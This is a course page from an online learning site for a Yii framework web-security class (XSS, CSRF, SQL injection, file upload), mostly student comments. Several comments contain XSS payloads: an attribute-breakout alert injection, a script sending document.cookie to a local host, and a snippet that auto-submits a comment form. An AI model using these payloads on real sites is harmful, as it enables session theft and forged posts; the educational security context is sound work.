为了账号安全,请及时绑定邮箱和手机立即绑定

Yii框架不得不说的故事—安全篇(3)

withy PHP开发工程师
难度中级
时长 3小时 1分
学习人数
综合评分9.77
55人评价 查看评价
9.8 内容实用
9.9 简洁易懂
9.6 逻辑清晰
这个课程可以!!!正好我在学web安全。
http://localhost/test/demo6.php?key=%26quot;;alert(1);//
解析后:onerror="var a = "123";alert(1);//>";"
<script>
var cookie=document.cookie;
window.location.href='http://127.0.0.1/index.php?cookie='+cookie;
</script>
document.getElementById('js-pl-textarea').value='测试';document.getElementNyId('js-pl-submit').click();
老师讲了漏洞,但是没讲怎么防御………………
火狐还是能弹出helloworld ie内核的就会出现老师的报错 谷歌浏览器直接就不给访问就拦下来了
火狐还是能弹出helloworld
感觉PHP还没学到啥,先学会盗号了【滑稽】
我的老师厉害了,太可怕了
老师讲的真棒,第一次这么深的认识sql注入
大赞,第一次听说lexer词法分析
跑个毛毛 哈哈
又刷了一遍 给老师点赞
课程须知
学习本门课程之前,建议先了解一下知识,会更有助于理解和掌握本门课程 1、掌握PHP基本的语言语法 2、了解sql语句和数据库 3、对互联网安全有一定的了解
老师告诉你能学到什么?
1、XSS、CSRF、SQL注入、文件上传漏洞等攻击方式。 2、YII框架中使用的lexer解析、cookie校验、pdo防范措施。

微信扫码,参与3人拼团

微信客服

购课补贴
联系客服咨询优惠详情

帮助反馈 APP下载

慕课网APP
您的移动学习伙伴

公众号

扫描二维码
关注慕课网微信公众号

友情提示:

您好,此课程属于迁移课程,您已购买该课程,无需重复购买,感谢您对慕课网的支持!

本次提问将花费2个积分

你的积分不足,无法发表

为什么扣积分?

本次提问将花费2个积分

继续发表请点击 "确定"

为什么扣积分?

举报

0/150
提交
取消